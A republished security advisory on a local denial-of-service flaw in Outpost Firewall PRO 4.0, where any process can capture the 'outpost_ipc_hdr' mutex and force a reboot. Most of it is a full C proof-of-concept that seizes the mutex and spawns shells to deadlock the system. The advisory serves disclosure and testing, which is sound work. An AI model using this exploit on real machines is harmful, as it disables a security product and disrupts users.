|
Brought to you by:
Suppliers of:
|
|
|
| |
| A vulnerability in the way Outpost Firewall handles an internal mutex called outpost_ipc_hdr allows local attacker to capture this mutex which in turn will cause the Outpost program to misbehave, which in turn forces the user to reboot the system. |
| |
Credit:
The information has been provided by Matousec - Transparent security Research.
The original article can be found at: http://www.matousec.com/info/advisories/Outpost-Enforcing-system-reboot-with-outpost_ipc_hdr-mutex.php
|
| |
Vulnerable software:
* Outpost Firewall PRO 4.0 (1007.591.145)
* Outpost Firewall PRO 4.0 (964.582.059)
Outpost insufficiently protects its own mutex outpost_ipc_hdr. Arbitrary process is able to open and capture this mutex. In such case, Outpost is not able to use this mutex for its synchronization and its internal mechanisms lock when they try to use it. Outpost uses this mutex every time a potentially dangerous operation is executed. For example, this results in an impossibility of running new processes while the mutex is locked. After the mutex is released, all blocked operations completes. However, the release can not be enforced. User is thus forced to reboot the system.
Exploit:
/*
Testing program for Enforcing system reboot with \"outpost_ipc_hdr\" mutex (BTP00002P004AO)
Usage:
prog
(the program is executed without special arguments)
Description:
This program calls standard Windows API to open and capture mutex. Then an attempt to create a child process
causes the deadlock. To terminate this testing program and to release the mutex press Ctrl+C.
Test:
Running the testing program.
*/
#include <stdio.h>
#include <windows.h>
#include <ddk/ntapi.h>
void about(void)
{
printf("Testing program for Enforcing system reboot with \"outpost_ipc_hdr\" mutex (BTP00002P004AO)\n");
printf("Windows Personal Firewall analysis project\n");
printf("Copyright 2007 by Matousec - Transparent security\n");
printf("http://www.matousec.com/""\n\n");
return;
}
void usage(void)
{
printf("Usage: test\n"
" (the program is executed without special arguments)\n");
return;
}
void print_last_error()
{
LPTSTR buf;
DWORD code=GetLastError();
if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
{
fprintf(stderr,"Error code: %ld\n",code);
fprintf(stderr,"Error message: %s",buf);
LocalFree(buf);
} else fprintf(stderr,"Unable to format error message for code %ld.\n",code);
return;
}
HANDLE capture_mutex(char *name)
{
wchar_t namew[MAX_PATH];
snwprintf(namew,MAX_PATH,L"%S",name);
UNICODE_STRING uniname;
RtlInitUnicodeString(&uniname,namew);
OBJECT_ATTRIBUTES oa;
InitializeObjectAttributes(&oa,&uniname,OBJ_CASE_INSENSITIVE | OBJ_OPENIF,0,NULL);
HANDLE mutex;
DWORD access=MUTANT_ALL_ACCESS;
NTSTATUS status=ZwOpenMutant(&mutex,access,&oa);
if (!NT_SUCCESS(status)) return 0;
printf("Mutex opened.\n");
if (WaitForSingleObject(mutex,5000)==WAIT_OBJECT_0) return mutex;
ZwClose(mutex);
return NULL;
}
int main(int argc,char **argv)
{
about();
if (argc!=1)
{
usage();
return 1;
}
while (1)
{
HANDLE mutex=capture_mutex("\\BaseNamedObjects\\outpost_ipc_hdr");
if (mutex)
{
printf("Mutex captured.\n"
"Running system shell. This action will block the system.\n");
WinExec("cmd",SW_NORMAL);
} else
{
fprintf(stderr,"Unable to capture \"outpost_ipc_hdr\" mutex.\n");
break;
}
}
printf("\nTEST FAILED!\n");
return 1;
}
|
|
|
|
|
